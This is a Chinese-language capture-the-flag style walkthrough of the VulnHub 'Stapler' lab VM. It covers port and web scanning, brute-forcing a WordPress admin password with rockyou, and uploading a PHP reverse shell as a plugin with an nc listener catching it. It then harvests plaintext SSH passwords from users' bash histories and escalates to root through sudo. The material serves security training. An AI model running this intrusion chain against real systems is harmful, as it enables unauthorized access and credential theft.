靶场搭建
下载地址:https://download.vulnhub.com/stapler/Stapler.zip
ovf文件直接导入VM会报错,因为它里面的数据结构进行过调整,需要按照Unicode字母顺序重新排列,以下是排列好的内容,需要覆盖掉原文件
<?xml version="1.0" encoding="UTF-8"?>
<!--Generated by VMware ovftool 4.1.0 (build-3018522), UTC time: 2016-06-07T10:02:55.518806Z-->
<Envelope vmw:buildId="build-3018522" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<References>
<File ovf:href="Stapler-disk1.vmdk" ovf:id="file1" ovf:size="757926912"/>
</References>
<DiskSection>
<Info>Virtual disk information</Info>
<Disk ovf:capacity="20" ovf:capacityAllocationUnits="byte * 2^30" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" ovf:populatedSize="2212560896"/>
</DiskSection>
<NetworkSection>
<Info>The list of logical networks</Info>
<Network ovf:name="hostonly">
<Description>The hostonly network</Description>
</Network>
</NetworkSection>
<VirtualSystem ovf:id="vm">
<Info>A virtual machine</Info>
<Name>Stapler</Name>
<OperatingSystemSection ovf:id="93" vmw:osType="ubuntuGuest">
<Info>The kind of installed guest operating system</Info>
</OperatingSystemSection>
<VirtualHardwareSection>
<Info>Virtual hardware requirements</Info>
<System>
<vssd:Caption>Virtual Hardware Family</vssd:Caption>
<vssd:InstanceID>0</vssd:InstanceID>
<vssd:VirtualSystemIdentifier>Stapler</vssd:VirtualSystemIdentifier>
<vssd:VirtualSystemType>vmx-15</vssd:VirtualSystemType>
</System>
<Item>
<rasd:AllocationUnits>hertz * 10^6</rasd:AllocationUnits>
<rasd:Caption>1 virtual CPU(s)</rasd:Caption>
<rasd:Description>Number of Virtual CPUs</rasd:Description>
<rasd:InstanceID>1</rasd:InstanceID>
<rasd:ResourceType>3</rasd:ResourceType>
<rasd:VirtualQuantity>1</rasd:VirtualQuantity>
</Item>
<Item>
<rasd:AllocationUnits>byte * 2^20</rasd:AllocationUnits>
<rasd:Caption>1024MB of memory</rasd:Caption>
<rasd:Description>Memory Size</rasd:Description>
<rasd:InstanceID>2</rasd:InstanceID>
<rasd:ResourceType>4</rasd:ResourceType>
<rasd:VirtualQuantity>1024</rasd:VirtualQuantity>
</Item>
<Item>
<rasd:Address>0</rasd:Address>
<rasd:Caption>sataController0</rasd:Caption>
<rasd:Description>SATA Controller</rasd:Description>
<rasd:InstanceID>3</rasd:InstanceID>
<rasd:ResourceSubType>AHCI</rasd:ResourceSubType>
<rasd:ResourceType>20</rasd:ResourceType>
</Item>
<Item ovf:required="false">
<rasd:Address>0</rasd:Address>
<rasd:Caption>usb</rasd:Caption>
<rasd:Description>USB Controller (EHCI)</rasd:Description>
<rasd:InstanceID>4</rasd:InstanceID>
<rasd:ResourceSubType>vmware.usb.ehci</rasd:ResourceSubType>
<rasd:ResourceType>23</rasd:ResourceType>
<vmw:Config ovf:required="false" vmw:key="ehciEnabled" vmw:value="true"/>
</Item>
<Item>
<rasd:Address>0</rasd:Address>
<rasd:Caption>scsiController0</rasd:Caption>
<rasd:Description>SCSI Controller</rasd:Description>
<rasd:InstanceID>5</rasd:InstanceID>
<rasd:ResourceSubType>lsilogic</rasd:ResourceSubType>
<rasd:ResourceType>6</rasd:ResourceType>
</Item>
<Item>
<rasd:AddressOnParent>2</rasd:AddressOnParent>
<rasd:AutomaticAllocation>true</rasd:AutomaticAllocation>
<rasd:Caption>ethernet0</rasd:Caption>
<rasd:Connection>hostonly</rasd:Connection>
<rasd:Description>PCNet32 ethernet adapter on "hostonly"</rasd:Description>
<rasd:InstanceID>6</rasd:InstanceID>
<rasd:ResourceSubType>PCNet32</rasd:ResourceSubType>
<rasd:ResourceType>10</rasd:ResourceType>
<vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
<vmw:Config ovf:required="false" vmw:key="wakeOnLanEnabled" vmw:value="false"/>
</Item>
<Item ovf:required="false">
<rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
<rasd:Caption>video</rasd:Caption>
<rasd:InstanceID>7</rasd:InstanceID>
<rasd:ResourceType>24</rasd:ResourceType>
<vmw:Config ovf:required="false" vmw:key="enable3DSupport" vmw:value="false"/>
<vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
</Item>
<Item ovf:required="false">
<rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
<rasd:Caption>vmci</rasd:Caption>
<rasd:InstanceID>8</rasd:InstanceID>
<rasd:ResourceSubType>vmware.vmci</rasd:ResourceSubType>
<rasd:ResourceType>1</rasd:ResourceType>
<vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
</Item>
<Item>
<rasd:AddressOnParent>0</rasd:AddressOnParent>
<rasd:Caption>disk0</rasd:Caption>
<rasd:HostResource>ovf:/disk/vmdisk1</rasd:HostResource>
<rasd:InstanceID>9</rasd:InstanceID>
<rasd:Parent>3</rasd:Parent>
<rasd:ResourceType>17</rasd:ResourceType>
<vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
</Item>
<Item ovf:required="false">
<rasd:AddressOnParent>1</rasd:AddressOnParent>
<rasd:AutomaticAllocation>false</rasd:AutomaticAllocation>
<rasd:Caption>cdrom0</rasd:Caption>
<rasd:InstanceID>10</rasd:InstanceID>
<rasd:Parent>3</rasd:Parent>
<rasd:ResourceType>15</rasd:ResourceType>
<vmw:Config ovf:required="false" vmw:key="slotInfo.pciSlotNumber" vmw:value="33"/>
</Item>
<vmw:Config ovf:required="false" vmw:key="cpuHotAddEnabled" vmw:value="true"/>
<vmw:Config ovf:required="false" vmw:key="memoryHotAddEnabled" vmw:value="true"/>
<vmw:Config ovf:required="false" vmw:key="powerOpInfo.powerOffType" vmw:value="soft"/>
<vmw:Config ovf:required="false" vmw:key="powerOpInfo.resetType" vmw:value="soft"/>
<vmw:Config ovf:required="false" vmw:key="powerOpInfo.suspendType" vmw:value="soft"/>
<vmw:Config ovf:required="false" vmw:key="tools.afterPowerOn" vmw:value="true"/>
<vmw:Config ovf:required="false" vmw:key="tools.afterResume" vmw:value="true"/>
<vmw:Config ovf:required="false" vmw:key="tools.beforeGuestShutdown" vmw:value="true"/>
<vmw:Config ovf:required="false" vmw:key="tools.beforeGuestStandby" vmw:value="true"/>
<vmw:Config ovf:required="false" vmw:key="tools.syncTimeWithHost" vmw:value="true"/>
<vmw:Config ovf:required="false" vmw:key="tools.toolsUpgradePolicy" vmw:value="upgradeAtPowerCycle"/>
</VirtualHardwareSection>
<AnnotationSection ovf:required="false">
<Info>A human-readable annotation</Info>
<Annotation>--[[~~Enjoy. Have fun. Happy Hacking.~~]]--
+ There are multiple methods to-do this machine: At least
-- Two (2) paths to get a limited shell
-- At least three (3) ways to get a root access</Annotation>
</AnnotationSection>
</VirtualSystem>
</Envelope>覆盖掉原文件后需要修改mf文件中记录的散列值:SHA1(Stapler.ovf)= 0737f41d2e522cda052c876ccb1fba6235dbacc5这样就可以
通过虚拟机打开功能打开ovf文件就可以了
老规矩,添加一张网卡,设置NAT模式,IP地址:192.168.74.139
信息收集
nmap
做一个快速地全端口扫描
┌──(root㉿kali)-[~]
└─# nmap 192.168.74.139 -p- -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 09:30 EDT
Nmap scan report for 192.168.74.139
Host is up (0.00032s latency).
Not shown: 65523 filtered tcp ports (no-response)
PORT STATE SERVICE
20/tcp closed ftp-data
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
123/tcp closed ntp
137/tcp closed netbios-ns
138/tcp closed netbios-dgm
139/tcp open netbios-ssn
666/tcp open doom
3306/tcp open mysql
12380/tcp open unknown
MAC Address: 00:0C:29:24:85:D3 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 54.69 seconds快速扫描没扫出来12380是什么东西,仔细扫扫看
┌──(root㉿kali)-[~]
└─# nmap 192.168.74.139 -sV -p 12380
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-08 09:36 EDT
Nmap scan report for 192.168.74.139
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
12380/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:24:85:D3 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.66 seconds发现原来也是个web
扫描一下漏洞:
nmap 192.168.74.139 --script=vuln发现存在smb-vuln-cve2009-3103,但是OS不是Windows。无
dirsearch
┌──(root㉿kali)-[~]
└─# dirsearch -u http://192.168.74.139
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.74.139/_24-04-08_09-32-20.txt
Target: http://192.168.74.139/
[09:32:20] Starting:
[09:32:21] 200 - 220B - /.bash_logout
[09:32:21] 200 - 4KB - /.bashrc
[09:32:26] 200 - 675B - /.profile
Task Completed三个shell配置文件,不知道这个靶场葫芦里卖的什么药
nikto
┌──(root㉿kali)-[~]
└─# nikto -h 192.168.74.139:12380
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.74.139
+ Target Hostname: 192.168.74.139
+ Target Port: 12380
+ Start Time: 2024-04-08 09:38:58 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'dave' found, with contents: Soemthing doesn't look right here.
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /c/: This might be interesting.
+ /js: This might be interesting.
+ /CSNews.cgi?command=viewnews&database=none: csNews reveals system path and other sensitive information in error messages. Also may be possible to bypass authentication mechanism.
+ /ci/: This might be interesting: potential country code (CÔte D'ivoire).
+ /is/: This might be interesting: potential country code (Iceland).
+ /ie/: This might be interesting: potential country code (Ireland).
+ /nu/: This might be interesting: potential country code (Niue).
+ /sb/: This might be interesting: potential country code (Solomon Islands).
+ /gs/: This might be interesting: potential country code (South Georgia And The South Sandwich Islands).
+ /wcadmin/login.aspx: QS/1 Webconnect administration panel.
+ 8115 requests: 14 error(s) and 14 item(s) reported on remote host
+ End Time: 2024-04-08 09:52:01 (GMT-4) (783 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested没有任何东西,奇了怪了,也看了看web,就是啥也没发现
再次信息收集
怎么也收集不到关键信息,甚至找不到入口在哪里。所以再次信息收集,怀疑是SSL协议,所以重新收集一下信息
dirsearch
┌──(root㉿kali)-[~]
└─# dirsearch -u https://192.168.74.139:12380
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/https_192.168.74.139_12380/_24-04-08_10-05-28.txt
Target: https://192.168.74.139:12380/
[10:05:28] Starting:
[10:05:35] 403 - 303B - /.ht_wsr.txt
[10:05:35] 403 - 306B - /.htaccess.bak1
[10:05:35] 403 - 306B - /.htaccess_orig
[10:05:35] 403 - 304B - /.htaccessBAK
[10:05:35] 403 - 308B - /.htaccess.sample
[10:05:35] 403 - 306B - /.htaccess.orig
[10:05:35] 403 - 305B - /.htaccessOLD2
[10:05:35] 403 - 296B - /.htm
[10:05:35] 403 - 304B - /.htaccess_sc
[10:05:35] 403 - 307B - /.htaccess_extra
[10:05:35] 403 - 306B - /.htaccess.save
[10:05:35] 403 - 297B - /.html
[10:05:35] 403 - 302B - /.htpasswds
[10:05:35] 403 - 306B - /.htpasswd_test
[10:05:35] 403 - 304B - /.htaccessOLD
[10:05:35] 403 - 303B - /.httr-oauth
[10:05:37] 403 - 296B - /.php
[10:05:37] 403 - 297B - /.php3
[10:06:27] 301 - 331B - /javascript -> https://192.168.74.139:12380/javascript/
[10:06:43] 301 - 331B - /phpmyadmin -> https://192.168.74.139:12380/phpmyadmin/
[10:06:45] 200 - 3KB - /phpmyadmin/doc/html/index.html
[10:06:45] 200 - 3KB - /phpmyadmin/
[10:06:45] 200 - 3KB - /phpmyadmin/index.php
[10:06:53] 200 - 59B - /robots.txt
[10:06:56] 403 - 305B - /server-status
[10:06:56] 403 - 306B - /server-status/
Task Completed nikto
┌──(root㉿kali)-[~]
└─# nikto -h https://192.168.74.139:12380/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.74.139
+ Target Hostname: 192.168.74.139
+ Target Port: 12380
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
Ciphers: ECDHE-RSA-AES256-GCM-SHA384
Issuer: /C=UK/ST=Somewhere in the middle of nowhere/L=Really, what are you meant to put here?/O=Initech/OU=Pam: I give up. no idea what to put here./CN=Red.Initech/emailAddress=pam@red.localhost
+ Start Time: 2024-04-08 10:05:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: Uncommon header 'dave' found, with contents: Soemthing doesn't look right here.
+ /: The site uses TLS and the Strict-Transport-Security HTTP header is not defined. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Strict-Transport-Security
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: Entry '/admin112233/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ RFC-1918 /blogblog/: IP address found in the 'x-pingback' header. The IP is "192.168.164.128". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /robots.txt: Entry '/blogblog/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ Hostname '192.168.74.139' does not match certificate's names: Red.Initech. See: https://cwe.mitre.org/data/definitions/297.html
+ OPTIONS: Allowed HTTP Methods: OPTIONS, GET, HEAD, POST .
+ /phpmyadmin/changelog.php: Uncommon header 'x-ob_mode' found, with contents: 1.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /phpmyadmin/: phpMyAdmin directory found.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8259 requests: 1 error(s) and 15 item(s) reported on remote host
+ End Time: 2024-04-08 10:13:34 (GMT-4) (471 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested这次就发现东西了
查看一下blogblog路径和admin112233
发现是wordpress和一个XSS钓鱼的页面
那就懂了,这个靶场是要干碎wordpress和使用Beef钓鱼
汇总
- admin112233路径
- blogblog路径
- phpmyadmin
- wordpress4.2.1
- Apache/2.4.18
- Ubuntu
- wpscan
- BEEF XSS钓鱼
- SSH爆破
- FTP爆破
- phpmyadmin
漏洞利用
wpscan
用wpscan扫一下先,直接扫描会报错seems to be down (SSL peer certificate or SSH remote key was not OK)
所以我们扫描的时候禁用tls检查
┌──(root㉿kali)-[~]
└─# wpscan --url https://192.168.74.139:12380/blogblog/ --disable-tls-checks 没有发现插件、主题等,那么攻击面就比较窄了,使用api-token看一下漏洞数量
┌──(root㉿kali)-[~]
└─# wpscan --url https://192.168.74.139:12380/blogblog/ --disable-tls-checks --api-token 我的KEY牛逼118个洞,有文件上柴暖、sql注入。具体就能能不能用我有点懒得试
尝试枚举用户名
┌──(root㉿kali)-[~]
└─# wpscan --url https://192.168.74.139:12380/blogblog/ --disable-tls-checks -e u[+] john
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] garry
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] peter
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] elly
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] kathy
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] harry
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] scott
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] heather
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] barry
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] tim
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)发现了一些用户名,可以尝试进行撞库,但是撞库我认为是底牌,在此之前先尝试其他的用法
其实扫出来118个漏洞都可以尝试使用,但是真不想一个个试了,需要再次收集一下信息
爆破
通过之前的信息收集能找到wp的上传文件夹,但是上传文件夹中有上传的插件,通过插件的名字查到漏洞信息,可以通过具体的漏洞信息进行getshell。但是很麻烦所以直接爆破wp账号的口令算了
解压常用的字典文件:gzip -d /usr/share/wordlists/rockyou.txt.gz
然后进行爆破
┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url https://192.168.74.139:12380/blogblog -P /usr/share/wordlists/rockyou.txt -U john --disable-tls-checks --max-threads 100 --password-attack wp-login爆破了18万次,这也是为什么不推荐的原因,实在是太久了。得到了账号密码:john/incorrect
登录进去之后发现是管理员权限
那就直接通过插件上传马子,或者直接修改模板写入一句话
通过插件上传kali自带的shell.php
nc监听拿到了反弹shell
┌──(root㉿kali)-[~]
└─# nc -lvp 1234
listening on [any] 1234 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.74.129] from bogon [192.168.74.139] 57954
Linux red.initech 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
14:49:29 up 2:17, 0 users, load average: 84.46, 78.24, 48.52
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 查看一下所有用户的历史记录cat /home/*/.bash_history
看到了两个账号密码
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost还有一条记录表明peter账号我们没有权限查看他的历史记录,所以估计是个高权限账号,我们就登录到这个账号里面去
进去之后查看sudo权限,直接切换root账号就可以
www-data@red:/home$ ssh peter@localhost
ssh peter@localhost
Could not create directory '/var/www/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:WuY26BwbaoIOawwEIZRaZGve4JZFaRo7iSvLNoCwyfA.
Are you sure you want to continue connecting (yes/no)? yes
yes
Failed to add the host to the list of known hosts (/var/www/.ssh/known_hosts).
-----------------------------------------------------------------
~ Barry, don't forget to put a message here ~
-----------------------------------------------------------------
peter@localhost's password: JZQuyIN5
Welcome back!
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~). This function can help you with a few settings that should
make your use of the shell easier.
You can:
(q) Quit and do nothing. The function will be run again next time.
(0) Exit, creating the file ~/.zshrc containing just a comment.
That will prevent this function being run again.
(1) Continue to the main menu.
(2) Populate your ~/.zshrc with the configuration recommended
by the system administrator and exit (you will need to edit
the file by hand, if so desired).
--- Type one of the keys in parentheses --- 2
2^J
prompt_adam1_setup:1: scalar parameter prompt_adam1_color1 created globally in function
prompt_adam1_setup:2: scalar parameter prompt_adam1_color2 created globally in function
prompt_adam1_setup:3: scalar parameter prompt_adam1_color3 created globally in function
prompt_adam1_setup:5: scalar parameter base_prompt created globally in function
prompt_adam1_setup:6: scalar parameter post_prompt created globally in function
prompt_adam1_setup:9: scalar parameter base_prompt_no_color created globally in function
prompt_adam1_setup:10: scalar parameter post_prompt_no_color created globally in function
/home/peter/.zshrc:15: scalar parameter HISTFILE created globally in function
(eval):1: scalar parameter LS_COLORS created globally in function
peter@red ~ %
peter@red ~ % sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for peter: JZQuyIN5
Matching Defaults entries for peter on red:
lecture=always, env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User peter may run the following commands on red:
(ALL : ALL) ALL
peter@red ~ % sudo su root
sudo su root
➜ peter id
id
uid=0(root) gid=0(root) groups=0(root)最终拿到了root权限
这个配置是关于用户
peter在主机red上的sudo权限配置。让我们来逐条解释这些配置项:
Defaults entries for peter on red:
lecture=always: 这个选项指定了当用户peter使用sudo时,系统应该始终显示授权信息和警告信息。env_reset: 这个选项指定了在运行sudo命令时,环境变量应该被重置为安全的默认值,以避免潜在的安全问题。mail_badpass: 这个选项指定了如果用户输入了错误的密码尝试使用sudo,系统应该通过邮件通知管理员。secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin: 这个选项指定了在使用sudo时,用户peter能够访问的命令路径。这里列出的路径是安全的系统默认路径,用户可以在这些路径中执行命令。User peter may run the following commands on red:
(ALL : ALL) ALL: 这个条目指定了用户peter在主机red上拥有完全的sudo权限。具体来说,它表示peter可以以任何用户身份(ALL)、在任何终端(ALL)、运行任何命令(ALL)。总结起来,这个配置允许用户
peter在主机red上使用sudo以任何用户身份运行任何命令,系统会始终显示授权信息和警告信息,环境变量会被重置为安全默认值,而且如果密码输入错误会通过邮件通知管理员。这样的配置是非常强大的,因此应该谨慎使用,确保只有经过授权的用户才能拥有这样的权限。
小结
思路很混乱,信息收集不是一个一次性的过程,而是多次循环的,太局限与初始的信息收集了,之后不再进行汇总式信息收集,而是随着深入进行收集,将汇总的信息单独放在最后
同时太懒,不愿意去看别人写的代码,并且不愿意去做尝试,这源于我对工具本省不熟练,没有组成属于自己习惯的攻击方式。导致遇到新的点就需要不停地切换不同的工具,进而产生怠惰
但是这种都需要一点点磨炼,一定要多动手才可以越来越轻松。
共勉,加油!